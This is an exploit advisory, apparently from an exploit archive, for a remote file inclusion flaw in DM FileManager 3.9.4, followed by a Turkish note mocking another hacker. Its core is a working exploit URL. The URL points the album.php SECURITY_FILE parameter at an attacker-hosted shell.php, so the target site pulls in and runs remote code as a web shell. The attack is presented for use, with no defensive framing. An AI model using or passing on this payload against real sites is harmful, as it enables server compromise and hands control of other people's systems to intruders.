id: 5433
date: 06/28/2009
title: DM FileManager 3.9.4 Remote File Inclusion Vulnerability
author: Septemb0x
cves: 

========================================================
DM FileManager 3.9.4 Remote File Inclusion Vulnerability
========================================================


#############################################################################################
[+] DM FileManager 3.9.4 Remote File Include Vulnerability
[+] Author : Septemb0x
[+] Dork : Yok Dork Mork :D
[+] Download Script : http://uploaded.to/file/3z84ie
[+] Product Site : http://www.dutchmonkey.com
#############################################################################################
[+] EXPLOIT;
[+] http://[sitename]/[path]/dm-albums/template/album.php?SECURITY_FILE=http://attackersite/shell.php
#############################################################################################
< ---- Note ---- >
H....R;
Sen cok ustun zekaya sahip birisin,
emin olbilirsin, :D
Sql injection ile domain hackleyebilen tek lamersin, :D
ASP'de Rfi Bulmakta Birebirsin,
Ama Gordugum En h?yar Lamersin :D
Bu Kafiyelerde Bi Taraf?na Girsin ;)
Lol H....R :D
< ---- Note Finished ---- >



#  0day.today [2023-03-26]  #